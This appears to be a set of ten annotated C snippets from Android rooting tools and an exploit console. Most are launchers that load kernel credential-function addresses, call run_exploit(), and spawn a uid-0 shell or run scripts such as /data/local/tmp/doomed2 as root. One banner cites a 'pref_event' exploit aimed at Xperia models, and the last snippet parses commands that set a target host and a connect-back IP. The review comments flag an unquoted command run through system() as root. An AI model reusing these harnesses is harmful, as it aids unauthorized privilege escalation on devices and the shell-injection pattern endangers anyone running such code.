Example #1
/*
 * JNI entry point. Stores three caller-supplied addresses in the file-level
 * ptmx_fops, prepare_kernel_cred and commit_creds variables, calls
 * run_exploit(), and reports whether this process now runs with uid 0.
 *
 * Returns 0 when getuid() is 0 after run_exploit(), -1 otherwise.
 *
 * NOTE(review): the three addresses are taken from the Java caller as-is;
 * nothing here checks that they match the running kernel build. How
 * run_exploit() uses them is not visible in this function.
 * NOTE(review): the only success signal is the process's own uid becoming 0
 * with no exec in between, which is also what a monitor would observe.
 */
JNIEXPORT int JNICALL Java_biz_hagurekamome_rootkitapp_MainActivity_native_1getroot
  (JNIEnv *env, jobject jo, jlong prepare_kernel_cred_addr, jlong commit_creds_addr, jlong ptmx_fops_addr)
{
	/*
	 * jlong is 64 bits wide; going through unsigned long keeps only the low
	 * bits on targets where unsigned long is 32 bits.
	 */
	ptmx_fops = (unsigned long)ptmx_fops_addr;
	prepare_kernel_cred = (void *)(unsigned long)prepare_kernel_cred_addr;
	commit_creds = (void *)(unsigned long)commit_creds_addr;

	run_exploit();

	return (getuid() == 0) ? 0 : -1;
}
Example #2
/*
 * Command-line front end: optional "-c <command>", device/variable setup,
 * run_exploit(), then a shell.
 *
 * Exit status is EXIT_FAILURE when setup_variables() fails or the process is
 * not uid 0 after run_exploit(). Otherwise it is EXIT_SUCCESS, including the
 * case where execl() fails and returns.
 *
 * NOTE(review): on success the shell (or the -c command) runs with the uid
 * this process has at that point, i.e. 0. The -c string is handed to
 * "/system/bin/sh -c" unchanged.
 */
int
main(int argc, char **argv)
{
  char *command = NULL;
  int idx = 1;

  /* The last "-c <string>" pair wins; a trailing "-c" with no value is ignored. */
  while (idx < argc) {
    if (strcmp(argv[idx], "-c") == 0) {
      idx++;
      if (idx < argc) {
        command = argv[idx];
      }
    }
    idx++;
  }

  device_detected();

  if (!setup_variables()) {
    fputs("Failed to setup variables.\n", stdout);
    return EXIT_FAILURE;
  }

  run_exploit();

  /* The process's own uid is the only success indicator checked. */
  if (getuid() != 0) {
    fputs("Failed to obtain root privilege.\n", stdout);
    return EXIT_FAILURE;
  }

  if (command != NULL) {
    /* Replaces this process image; only returns if the exec failed. */
    execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL);
  } else {
    /* Interactive shell as a child; its exit status is not inspected. */
    system("/system/bin/sh");
  }

  return EXIT_SUCCESS;
}
Example #3
/*
 * Resolves the addresses the run needs, calls run_exploit(), and starts
 * /system/bin/sh when the process ends up with uid 0.
 *
 * Exit status: EXIT_FAILURE when an address lookup fails or the uid is not 0
 * afterwards, EXIT_SUCCESS otherwise.
 */
int
main(int argc, char **argv)
{
  /* Hard-coded offset; presumably specific to the targeted devices (confirm). */
  set_kernel_phys_offset(0x200000);

  remap_pfn_range = get_remap_pfn_range_address();
  if (!remap_pfn_range) {
    fputs("You need to manage to get remap_pfn_range addresses.\n", stdout);
    return EXIT_FAILURE;
  }

  if (!setup_creds_functions()) {
    fputs("Failed to get prepare_kernel_cred and commit_creds addresses.\n", stdout);
    return EXIT_FAILURE;
  }

  run_exploit();

  /* Success is judged solely by this process's uid. */
  if (getuid() != 0) {
    fputs("Failed to obtain root privilege.\n", stdout);
    return EXIT_FAILURE;
  }

  /* Child shell inherits uid 0; system()'s return value is ignored. */
  system("/system/bin/sh");

  return EXIT_SUCCESS;
}
/*
 * Minimal launcher: calls run_exploit() with no visible setup, then starts
 * /system/bin/sh if the process has uid 0.
 *
 * Exit status: EXIT_FAILURE when getuid() is not 0 after run_exploit(),
 * EXIT_SUCCESS otherwise (the shell's own exit status is not propagated).
 */
int
main(int argc, char **argv)
{
  run_exploit();

  if (getuid() == 0) {
    /* A uid-0 shell spawned as a child of this process. */
    system("/system/bin/sh");
    return EXIT_SUCCESS;
  }

  fputs("Failed to obtain root privilege.\n", stdout);
  return EXIT_FAILURE;
}
Example #5
/*
 * Looks up the credential-function addresses, calls run_exploit(), and
 * starts /system/bin/sh when the process has uid 0 afterwards.
 *
 * Exit status: EXIT_FAILURE when setup_creds_functions() fails or the uid is
 * not 0 after run_exploit(), EXIT_SUCCESS otherwise.
 */
int
main(int argc, char **argv)
{
  int have_addresses = setup_creds_functions();

  if (!have_addresses) {
    fputs("Failed to get prepare_kernel_cred and commit_creds addresses.\n", stdout);
    return EXIT_FAILURE;
  }

  run_exploit();

  /* No other verification is done: uid 0 is treated as success. */
  if (getuid() != 0) {
    fputs("Failed to obtain root privilege.\n", stdout);
    return EXIT_FAILURE;
  }

  /* Return value of system() is discarded. */
  system("/system/bin/sh");

  return EXIT_SUCCESS;
}
Example #6
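/*
 * JNI entry point. Builds the shell command
 *   "<jstr>/install_tool.sh <jstr> >/data/local/tmp/err.txt 2>&1"
 * then detects the device addresses, calls run_exploit(), and runs the
 * command with system() if the process has uid 0.
 *
 * The original author's sample of the resulting command was
 *   /data/data/biz.hagurekamome.jnitest/cache/install_tool.sh >/data/local/tmp/err.txt 2>&1
 *
 * Returns:
 *    0  the command ran and system() returned 0
 *   -1  detect_injection_addresses() failed
 *   -2  uid is not 0 after run_exploit()
 *   -3  jstr could not be read, or the command would not fit in cachebuf
 *   otherwise the non-zero value returned by system()
 *
 * Changes from the original: the command was assembled with unchecked
 * strcpy/strcat into a 256-byte stack buffer, so a long jstr wrote past the
 * buffer; the length is now checked first. The UTF string obtained from the
 * JVM is now checked for NULL and released.
 *
 * NOTE(review): jstr is interpolated unquoted into a command line that
 * system() runs as uid 0. Presumably the caller passes the app's cache
 * directory; confirm it can never contain whitespace or shell
 * metacharacters.
 */
JNIEXPORT int JNICALL Java_biz_hagurekamome_getroot_MainActivity_native_1getroot
  (JNIEnv *env, jobject jo, jstring jstr)
{
	char cachebuf[256];
	const char *execommand = "/install_tool.sh ";
	const char *param = " >/data/local/tmp/err.txt 2>&1";
	const char *str;
	size_t fixed_len;
	int result;

	str = (*env)->GetStringUTFChars(env, jstr, 0);
	if (!str) {
		return -3;
	}

	/* str appears twice in the command; the +1 is the terminating NUL. */
	fixed_len = strlen(execommand) + strlen(param) + 1;
	if (strlen(str) > (sizeof cachebuf - fixed_len) / 2) {
		(*env)->ReleaseStringUTFChars(env, jstr, str);
		return -3;
	}

	strcpy(cachebuf, str);
	strcat(cachebuf, execommand);
	strcat(cachebuf, str);
	strcat(cachebuf, param);

	/* cachebuf holds its own copy, so the JVM string can be released now. */
	(*env)->ReleaseStringUTFChars(env, jstr, str);

	if (!detect_injection_addresses()) {
		return -1;
	}

	prepare_kernel_cred = supported_devices[st_pos].prepare_kernel_cred;
	commit_creds = supported_devices[st_pos].commit_creds;

	run_exploit();

	if (getuid() != 0) {
		return -2;
	}

	/* Runs through the shell with this process's uid (0 at this point). */
	result = system(cachebuf);
	if (result != 0) {
		return result;
	}

	return 0;
}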
Example #7
/*
 * Command-line front end: optional "-c <command>", address lookup,
 * run_exploit(), then either the given command or an interactive shell.
 *
 * Exit status is EXIT_FAILURE when an address lookup fails or the uid is not
 * 0 after run_exploit(). Otherwise it is EXIT_SUCCESS, which is also what
 * the process reports if execl() fails and returns.
 */
int
main(int argc, char **argv)
{
  char *command = NULL;
  int idx = 1;

  /* Scan for "-c <string>"; the last occurrence wins, a bare "-c" is ignored. */
  while (idx < argc) {
    if (strcmp(argv[idx], "-c") == 0) {
      idx++;
      if (idx < argc) {
        command = argv[idx];
      }
    }
    idx++;
  }

  /* Hard-coded offset; presumably specific to the targeted devices (confirm). */
  set_kernel_phys_offset(0x200000);

  remap_pfn_range = get_remap_pfn_range_address();
  if (!remap_pfn_range) {
    fputs("You need to manage to get remap_pfn_range addresses.\n", stdout);
    return EXIT_FAILURE;
  }

  if (!setup_creds_functions()) {
    fputs("Failed to get prepare_kernel_cred and commit_creds addresses.\n", stdout);
    return EXIT_FAILURE;
  }

  run_exploit();

  if (getuid() != 0) {
    fputs("Failed to obtain root privilege.\n", stdout);
    return EXIT_FAILURE;
  }

  if (command != NULL) {
    /* The -c string reaches the shell unchanged and runs with uid 0. */
    execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL);
  } else {
    system("/system/bin/sh");
  }

  return EXIT_SUCCESS;
}
Example #8
/*
 * Prints a version banner, resolves the addresses the run needs, calls
 * run_exploit(), and on uid 0 runs the script /data/local/tmp/doomed2
 * through /system/bin/sh.
 *
 * Exit status: EXIT_FAILURE when an address lookup fails or the uid is not 0
 * afterwards, EXIT_SUCCESS otherwise (the script's status is not checked).
 *
 * NOTE(review): the script path is under /data/local/tmp, which on stock
 * Android is writable by the shell user. Whatever file is at that path when
 * system() runs is executed as uid 0. The file's presence there is also a
 * usable forensic indicator.
 */
int
main(int argc, char **argv)
{
  static const char *const banner[] = {
    "run_root_shell v2.2\n",
    "Based on pref_event exploit\n\n",
    "Modified for auto-rooting by DooMLoRD\n",
    "Part of Easy Rooting Toolkit\n\n",
    "Changelog:\n",
    "v2.0: added support for Xperia S  (LT26)  {FW: 6.2.B.0.211}    [Cust: 1257-8080]\n",
    "v2.1: added support for Xperia Z  (C6603) {FW: 10.1.1.A.1.307} [Cust: 1270-6704]\n",
    "v2.2: added support for Xperia SP (C5302) {FW: 12.0.A.1.284}   [Cust: 1272-1092]\n",
  };
  size_t line;

  for (line = 0; line < sizeof banner / sizeof banner[0]; line++) {
    fputs(banner[line], stdout);
  }

  /* Hard-coded offset; presumably tied to the devices listed above (confirm). */
  set_kernel_phys_offset(0x200000);

  remap_pfn_range = get_remap_pfn_range_address();
  if (!remap_pfn_range) {
    fputs("You need to manage to get remap_pfn_range addresses.\n", stdout);
    return EXIT_FAILURE;
  }

  if (!setup_creds_functions()) {
    fputs("Failed to get prepare_kernel_cred and commit_creds addresses.\n", stdout);
    return EXIT_FAILURE;
  }

  run_exploit();

  if (getuid() != 0) {
    fputs("Failed to obtain root privilege.\n", stdout);
    return EXIT_FAILURE;
  }

  fputs("Launching auto-root script!\n", stdout);
  system("/system/bin/sh /data/local/tmp/doomed2");

  return EXIT_SUCCESS;
}
Example #9
/*
 * Picks the credential-function addresses for the detected device from
 * supported_devices[], calls run_exploit(), and runs EXECCOMMAND through
 * system() when the process has uid 0.
 *
 * Returns -1 when detect_injection_addresses() fails; exits with
 * EXIT_FAILURE when the uid is not 0 afterwards, EXIT_SUCCESS otherwise.
 *
 * NOTE(review): EXECCOMMAND is defined outside this function; whatever it
 * expands to is run by the shell with uid 0.
 */
int main(int argc, char **argv) {
	if (!detect_injection_addresses()) {
		return -1;
	}

	/* st_pos is set elsewhere; presumably by detect_injection_addresses() (confirm). */
	prepare_kernel_cred = supported_devices[st_pos].prepare_kernel_cred;
	commit_creds = supported_devices[st_pos].commit_creds;

	fputs("Try Get TempRoot...\n", stdout);
	run_exploit();

	/* The process's uid is the only success check. */
	if (getuid() != 0) {
		fputs("Failed to getroot.\n", stdout);
		return EXIT_FAILURE;
	}

	fputs("Succeeded in getroot!\n", stdout);
	system(EXECCOMMAND);

	return EXIT_SUCCESS;
}
Example #10
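/*
 * Parse one console line and act on the commands found in it.
 *
 * The line is split on spaces with strtok(), so it is modified in place and
 * the function is not reentrant. Recognised forms:
 *   set target_host <value>
 *   set connect_back_ip <value>
 *   show exploits
 *   use exploit <module id | module path>
 *   exploit
 *
 * Returns 0 in every case. The original had no return statement although it
 * is declared int, so a caller reading the result got an indeterminate
 * value.
 *
 * Changes from the original: every strtok() result is checked before use. A
 * truncated command such as "set" or "use exploit" previously passed NULL to
 * strcmp()/snprintf(); it now ends parsing of the line. A NULL line is
 * rejected up front. Handling of complete commands is unchanged, including
 * the fall-through where an argument token is itself tested against the
 * later keywords.
 *
 * NOTE(review): the 254-byte limit assumes target_host and connect_back_ip
 * are at least that large; their declarations are not visible here.
 * NOTE(review): only the "show" and "use" arguments go through chomp(). A
 * value given to "set" is stored as tokenised, presumably with any trailing
 * newline still attached; confirm against the caller.
 */
int
parse_command(char *line)
{
	char *token;
	int module_id;

	if (line == NULL) {
		return 0;
	}

	token = strtok(line, " ");

	while (token != NULL) {

		/* set <name> <value> */
		if (strcmp(token, "set") == 0) {
			token = strtok(NULL, " ");
			if (token == NULL) {
				break;
			}

			if (strcmp(token, "target_host") == 0) {
				token = strtok(NULL, " ");
				if (token == NULL) {
					break;
				}
				snprintf(target_host, 254, "%s", token);
				printf("\n%s[!]%s target_host set : %s\n\n", _GREEN, _ENDC, target_host);
			}

			if (strcmp(token, "connect_back_ip") == 0) {
				token = strtok(NULL, " ");
				if (token == NULL) {
					break;
				}
				snprintf(connect_back_ip, 254, "%s", token);
				printf("\n%s[!]%s connect_back_ip set : %s\n\n", _GREEN, _ENDC, connect_back_ip);
			}
		}

		/* show exploits */
		if (strcmp(token, "show") == 0) {
			token = strtok(NULL, " ");
			if (token == NULL) {
				break;
			}

			chomp(token);

			if (strcmp(token, "exploits") == 0) {
				show_all_modules_by_type("EXPLOIT");
			}
		}

		/* use exploit <id|path> */
		if (strcmp(token, "use") == 0) {
			token = strtok(NULL, " ");
			if (token == NULL) {
				break;
			}

			if (strcmp(token, "exploit") == 0) {
				token = strtok(NULL, " ");
				if (token == NULL) {
					break;
				}

				chomp(token);

				if (is_int(token)) {
					/* Numeric argument: select by module id if it exists. */
					module_id = atoi(token);
					if (module_exists(module_id)) {
						current_exploit = module_id;
						printf("\n%s[!]%s exploit ready\n\n", _GREEN, _ENDC);
					} else {
						printf("\n%s[!]%s could not find exploit\n\n", _RED, _ENDC);
					}
				} else {
					/* Otherwise treat it as a module path; a negative result means not found. */
					current_exploit = find_module_by_path(token);
					if (current_exploit >= 0) {
						printf("\n%s[!]%s exploit ready\n\n", _GREEN, _ENDC);
					} else {
						printf("\n%s[!]%s could not find exploit\n\n", _RED, _ENDC);
					}
				}
			}
		}

		/* exploit: run the selected module once its parameters check out */
		if (strcmp(token, "exploit") == 0) {
			if (current_exploit < 0) {
				printf("\n%s[!]%s no exploit set \n\n", _RED, _ENDC);
			} else if (check_exploit_params()) {
				run_exploit();
			}
		}

		token = strtok(NULL, " ");
	}

	return 0;
}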